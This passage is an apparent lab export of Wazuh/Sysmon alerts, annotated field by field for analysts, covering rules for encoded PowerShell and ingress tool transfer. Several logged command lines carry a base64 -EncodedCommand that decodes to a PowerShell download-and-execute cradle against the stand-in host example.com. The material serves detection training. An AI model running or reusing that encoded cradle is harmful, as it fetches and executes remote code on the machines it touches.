data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 8 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534206.794207 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:33:51.4872058Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 280774 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:33:51.481
ProcessGuid: {94294ddc-bc4e-680a-450a-000000000e00}
ProcessId: 9340
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_iirz44hw.ut4.ps1
CreationUtcTime: 2025-04-24 22:33:51.481
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:33:51.481 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bc4e-680a-450a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9340 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_iirz44hw.ut4.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:33:51.481 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534206.796971 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:33:59.8990721Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 280869 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:33:58.812
ProcessGuid: {94294ddc-bc56-680a-4d0a-000000000e00}
ProcessId: 10156
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bc54-680a-4a0a-000000000e00}
ParentProcessId: 12404
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:33:58.812 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bc56-680a-4d0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10156 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bc54-680a-4a0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 12404 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 9 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534206.805041 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:34:00.0990056Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 280870 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:34:00.059
ProcessGuid: {94294ddc-bc56-680a-4d0a-000000000e00}
ProcessId: 10156
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_e3qarsmw.y43.ps1
CreationUtcTime: 2025-04-24 22:34:00.059
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:34:00.059 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bc56-680a-4d0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10156 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_e3qarsmw.y43.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:34:00.059 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 6 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534206.807809 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:34:04.5719304Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 280933 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:34:03.416
ProcessGuid: {94294ddc-bc5b-680a-510a-000000000e00}
ProcessId: 8180
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bc59-680a-4f0a-000000000e00}
ParentProcessId: 11636
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:34:03.416 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bc5b-680a-510a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8180 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bc59-680a-4f0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 11636 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 7 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534206.815875 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:34:10.9720728Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 280968 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:34:09.726
ProcessGuid: {94294ddc-bc61-680a-550a-000000000e00}
ProcessId: 3924
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
